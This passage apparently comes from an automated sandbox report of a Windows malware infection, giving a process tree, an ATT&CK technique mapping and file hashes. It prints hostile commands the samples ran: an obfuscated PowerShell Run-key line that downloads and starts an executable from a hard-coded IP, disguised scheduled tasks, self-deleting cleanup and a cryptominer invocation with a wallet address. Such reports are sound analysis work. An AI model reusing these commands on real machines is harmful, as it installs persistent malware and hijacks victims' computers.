                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\0e406f64-cf54-4a93-970f-aaf0380891e2\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                            PID:4692
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                              taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                              PID:4796
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                              PID:3564
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\0e406f64-cf54-4a93-970f-aaf0380891e2\build3.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\0e406f64-cf54-4a93-970f-aaf0380891e2\build3.exe"
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:3660
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\0e406f64-cf54-4a93-970f-aaf0380891e2\build3.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\0e406f64-cf54-4a93-970f-aaf0380891e2\build3.exe"
                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                              PID:3428
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                PID:3720
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F603.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F603.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:2980
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\21B6.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\21B6.exe
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:2616
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4ECF.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\4ECF.exe
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:288
                                                                                                                                                                                                                                                                                                          • C:\ProgramData\Runtimebroker.exe
                                                                                                                                                                                                                                                                                                            "C:\ProgramData\Runtimebroker.exe"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:2068
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91''+''.241''+''.19''+''.52/Ru''+''nt''+''im''+''ebr''+''oke''+''r.exe''),(''Vpnm.''+''e''+''xe''));Start-Process (''V''+''p''+''nm.exe'')'
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:3432
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                  "powershell" Get-MpPreference -verbose
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:3700
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5BF9.exe
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5BF9.exe
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:2312
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5BF9.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\5BF9.exe"
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:1880
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5BF9.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\5BF9.exe"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:1724
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5BF9.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5BF9.exe"
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:3288
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9062.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\9062.exe
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:2092
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Forgesoft\FSU Admin Center\fsucenter.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Forgesoft\FSU Admin Center\fsucenter.exe"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:3532
                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                                                                -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:4968
                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Systemd\HostData.exe
                                                                                                                                                                                                                                                                                                                                  NULL
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:5044
                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                                                                    -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:3768
                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                                                                      -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:2876
                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                                                                        -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:2252
                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                                                                          -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:4652
                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                                                                            -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:4608
                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                                                                              -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:5100
                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                                                                                -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:3472
                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                                                                                  -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4296
                                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\Systemd\HostData.exe
                                                                                                                                                                                                                                                                                                                                                    NULL
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4504
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\AC8B.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\AC8B.exe
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2120
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\AC8B.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\AC8B.exe
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2860
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C1A1.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\C1A1.exe
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1532
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D5AF.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D5AF.exe
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:2344
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EB90.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\EB90.exe
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:2196
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\88.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\88.exe
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:348
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\88.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\88.exe
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:3120
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2764
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2192
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:2756
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:2260
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1388
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:2844
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1004
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:2332
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:2268
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                  schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_20004\taskhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                  PID:1664
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                  schtasks.exe /create /tn "E7C0" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\8 (6)\E7C0.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                  PID:4136
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                  schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format\powershell.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                  PID:4276
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                  schtasks.exe /create /tn "2rHGj1dudUyLkT0vlRyWCagL" /sc ONLOGON /tr "'C:\Users\Admin\Documents\ow42sHAtTwqAiKEBVv8kYM8r\2rHGj1dudUyLkT0vlRyWCagL.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                  PID:4492
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                  schtasks.exe /create /tn "9Phvd9m4Q_gR9zoMgg9pnscn.tmp" /sc ONLOGON /tr "'C:\Recovery\4537d782-9a0d-11eb-a52e-c2ebb310cb62\9Phvd9m4Q_gR9zoMgg9pnscn.tmp.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                  PID:4732
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                  PID:4480
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:4148
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E31A.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E31A.exe
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:2648
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E31A.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E31A.exe
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:320

                                                                                                                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                                                                                                                                                                      File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1222

                                                                                                                                                                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1018

                                                                                                                                                                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\libcurl.dll
                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\libcurlpp.dll
                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\libstdc++-6.dll
                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\libwinpthread-1.dll
                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\setup_install.exe
                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\setup_install.exe
                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\sonia_1.exe
                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0D6E8ED4\sonia_1.exe
                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                                                                                                                        SHA512

